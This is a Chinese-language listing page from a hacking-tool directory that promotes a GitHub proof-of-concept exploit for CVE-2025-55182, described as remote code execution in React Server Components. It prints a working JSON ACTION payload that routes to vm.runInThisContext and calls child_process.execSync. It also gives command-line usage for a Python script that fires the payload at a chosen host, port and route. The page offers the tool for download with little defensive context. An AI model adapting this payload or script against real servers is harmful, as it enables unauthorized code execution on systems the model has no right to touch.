Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182POC — 针对CVE-2025-55182的概念验证利用程序,演示通过恶意ACTION有效载荷和vm.runInThisContext注入在React Server Components中实现远程代码执行。 | Kitploit
工具/GitHubGitHub/sudo-yangziran/cve-2025-55182poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubsudo-yangziran/cve-2025-55182poc

CVE-2025-55182POC

针对CVE-2025-55182的概念验证利用程序,演示通过恶意ACTION有效载荷和vm.runInThisContext注入在React Server Components中实现远程代码执行。

查看仓库
229个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 React Server Components RCE POC

本项目为 CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept,演示在特定条件下可通过 vm.runInThisContext 与 恶意 ACTION payload 触发远程代码执行。

  • Python 端:自动化发送恶意 ACTION payload 并解析响应

⚠ 漏洞简介(CVE-2025-55182)

React Server Components 的 ACTION payload 在某些条件下会:

  • 被反序列化为 JS 对象
  • 进入 vm.runInThisContext 执行
  • 自动注入到 server actions 中

攻击者可构造 payload:

root@kitploit:~
{
  "$ACTION_REF_0": "",
  "$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
参数是否必填默认值说明
--host是无目标服务器的 IP 或域名。例如:127.0.0.1、192.168.1.10、example.com
--port否80目标 HTTP 服务端口,例如:3003
--path是无目标可触发漏洞的路由路径,例如:/feedback、/action
--https否False是否使用 HTTPS 发送 payload(默认 HTTP)

python a.py --host <目标IP> --port <端口> --path <目标URL路径>

python a.py --host 127.0.0.1 --port 3003 --path /feedback

下载工具